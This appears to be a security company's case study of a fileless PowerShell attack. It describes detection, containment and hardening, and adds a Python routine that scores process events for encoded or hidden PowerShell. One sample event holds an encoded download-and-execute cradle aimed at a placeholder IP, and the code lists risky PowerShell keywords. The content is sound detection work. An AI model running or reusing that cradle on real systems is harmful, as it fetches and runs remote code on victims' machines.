During routine monitoring, the i6 Security Operations Center (SOC) detected suspicious PowerShell activity on an employee workstation. The commands being executed were highly unusual and did not match normal application behavior.
Initial analysis suggested that the commands were part of a fileless malware attack, a technique that allows attackers to run malicious code directly in system memory without installing traditional malware files.
Because fileless attacks are designed to evade traditional antivirus detection, rapid investigation by the i6 SOC team was critical to stopping the threat before persistence could be established.
The alert was triggered when the i6 monitoring platform detected encoded PowerShell commands being executed on the system.
These commands were attempting to launch hidden PowerShell sessions, execute encoded scripts, and connect to an external command server.
Such behavior is commonly associated with fileless malware and post-exploitation frameworks used by attackers.
Once the alert was triggered, the i6 SOC analysts began a detailed investigation to understand the attacker’s objective.
The first step involved analyzing the executed PowerShell commands. The investigation revealed that the attacker attempted to run Base64 encoded commands, which are commonly used to hide malicious scripts from security tools.
Endpoint telemetry showed that the PowerShell process was launched by a suspicious parent process that had no legitimate reason to run scripting commands. This strongly indicated that the activity was triggered by a malicious script rather than a legitimate user action.
Further analysis revealed that the PowerShell script attempted to establish communication with an external server. The server was likely intended to act as a command-and-control (C2) system, allowing the attacker to remotely control the compromised machine.
To ensure the attack had not spread, the i6 team conducted threat hunting across the environment. Security analysts searched for similar PowerShell commands and indicators of compromise across other systems. No additional compromised systems were discovered.
After confirming the suspicious PowerShell activity, the i6 SOC team immediately initiated containment procedures to prevent the attacker from maintaining access.
The containment actions included terminating the malicious PowerShell processes running in memory, isolating the affected workstation from the corporate network, blocking outbound communication to the identified command-and-control infrastructure, and disabling the compromised user account associated with the activity.
Because the malware was operating in memory, stopping the active processes and isolating the system prevented the attacker from establishing persistence.
The workstation was then placed under forensic review to confirm that no additional malicious scripts remained active.
After the incident was contained, i6 implemented additional detection measures to prevent similar attacks in the future.
These improvements included implementing stricter monitoring for suspicious PowerShell and command-line activity, enabling advanced detection rules for encoded or obfuscated PowerShell commands, restricting PowerShell execution policies to limit unauthorized script execution, enhancing endpoint monitoring to detect fileless malware behavior in memory, and improving logging and alerting for abnormal scripting activity across systems.
These improvements significantly strengthened the organization’s ability to detect fileless attacks that attempt to abuse legitimate system tools.
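As an added illustration of the detection approach described above (example code, not the i6 platform's own rules), the following Python triage routine scores process-creation events on the signals this incident exposed: an unexpected parent process, a hidden window, an encoded command, risky content inside the decoded payload, and a reference to an external server. The events, host names, parent processes, score weights and the keyword list are all constructed for the example and would be tuned to an environment's own baseline.

```python
import base64
import re

def b64_utf16(script: str) -> str:  # base64 over UTF-16LE, as -EncodedCommand expects
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (not incident telemetry), shaped like EDR / Sysmon ID 1 records.
SAMPLE_EVENTS = [
    {"host": "WS-0421", "parent": "wscript.exe", "cmdline": "powershell.exe -NoP -W Hidden -Enc "
     + b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/x')")},
    {"host": "WS-0102", "parent": "explorer.exe", "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"host": "WS-0377", "parent": "explorer.exe",
     "cmdline": "powershell.exe -EncodedCommand " + b64_utf16("Get-Process | Select-Object Name, Id")},
]

# PowerShell accepts -e, -ec, -en, -enc and -encodedcommand for the same flag.
ENCODED_ARG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
URL = re.compile(r"https?://\S+", re.I)
RISKY = re.compile(r"\b(?:iex|invoke-expression|downloadstring|net\.webclient|invoke-webrequest|frombase64string)\b", re.I)
EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "code.exe"}
ALERT_THRESHOLD = 5

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(event: dict):
    """Score one event on the signals seen in this incident; returns (score, reasons, decoded)."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    text = cmdline + " " + (decoded or "")  # inspect both the raw and the decoded text
    hits = sorted({h.lower() for h in RISKY.findall(text)})
    checks = [
        (event["parent"].lower() not in EXPECTED_PARENTS, 3, "unexpected parent " + event["parent"]),
        (HIDDEN_WINDOW.search(cmdline), 2, "hidden window"),
        (decoded is not None, 2, "encoded command"),
        (hits, 3, "risky content: " + ", ".join(hits)),
        (URL.search(text), 2, "external URL"),
    ]
    score = sum(pts for ok, pts, _ in checks if ok)
    return score, [why for ok, _, why in checks if ok], decoded

def triage(events):  # events at or above the threshold, with the evidence an analyst needs
    scored = [(e["host"], *score_event(e)) for e in events]
    return [dict(host=h, score=s, reasons=r, decoded=d) for h, s, r, d in scored if s >= ALERT_THRESHOLD]
```

Only the first sample reaches the threshold; the third shows that an encoded command on its own (here a benign inventory query under a normal parent) stays below it, which is what keeps the rule from paging on every management script.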
Fileless malware attacks represent a growing threat because they rely on legitimate system tools like PowerShell to execute malicious code.
In this incident, i6’s proactive monitoring and rapid investigation enabled the SOC team to detect and stop the attack before it could establish persistence or spread within the network.
The case demonstrates the importance of advanced behavioral monitoring and expert threat analysis in defending against modern cyber threats.
i6 is a modern cybersecurity company dedicated to protecting businesses from digital threats. With expert solutions, 24/7 monitoring, and proven strategies, we secure your future in a connected world.